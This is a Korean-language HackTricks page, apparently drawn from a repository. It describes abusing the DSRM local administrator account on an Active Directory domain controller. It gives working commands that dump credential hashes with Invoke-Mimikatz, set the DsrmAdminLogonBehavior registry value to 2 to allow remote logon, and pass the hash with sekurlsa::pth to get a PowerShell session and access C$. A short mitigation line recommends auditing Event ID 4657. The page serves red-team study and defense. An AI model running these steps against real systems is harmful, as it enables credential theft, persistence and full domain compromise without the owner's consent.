hacktricks/windows-hardening/active-directory-methodology/dsrm-credentials.md
2024-02-10 21:30:13 +00:00

4.1 KiB

htARTE (HackTricks AWS Red Team Expert)를 통해 AWS 해킹을 처음부터 전문가까지 배워보세요!

HackTricks를 지원하는 다른 방법:

DSRM 자격 증명

DC에는 로컬 관리자 계정이 있습니다. 이 컴퓨터에서 관리자 권한을 가지고 있다면 mimikatz를 사용하여 로컬 관리자 해시를 덤프할 수 있습니다. 그런 다음 레지스트리를 수정하여 이 패스워드를 활성화하여 원격으로 이 로컬 관리자 사용자에 액세스할 수 있습니다.
먼저 DC 내부의 로컬 관리자 사용자의 해시덤프해야 합니다:

Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"'

그런 다음 해당 계정이 작동하는지 확인해야 하며, 레지스트리 키의 값이 "0"인지 또는 존재하지 않는지 확인해야 합니다. 그렇지 않으면 "2"로 설정해야 합니다:

Get-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior #Check if the key exists and get the value
New-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2 -PropertyType DWORD #Create key with value "2" if it doesn't exist
Set-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2  #Change value to "2"

그런 다음 PTH를 사용하여 C$의 내용을 나열하거나 쉘을 얻을 수 있습니다. PTH를 사용하여 메모리에 해당 해시로 새로운 PowerShell 세션을 만들 때 "도메인"은 DC 머신의 이름만 사용됩니다.

sekurlsa::pth /domain:dc-host-name /user:Administrator /ntlm:b629ad5753f4c441e3af31c97fad8973 /run:powershell.exe
#And in new spawned powershell you now can access via NTLM the content of C$
ls \\dc-host-name\C$

더 많은 정보는 다음에서 확인할 수 있습니다: https://adsecurity.org/?p=1714https://adsecurity.org/?p=1785

완화 방법

  • 이벤트 ID 4657 - HKLM:\System\CurrentControlSet\Control\Lsa DsrmAdminLogonBehavior의 생성/변경 감사
htARTE (HackTricks AWS Red Team Expert)를 통해 AWS 해킹을 처음부터 전문가까지 배워보세요!

HackTricks를 지원하는 다른 방법: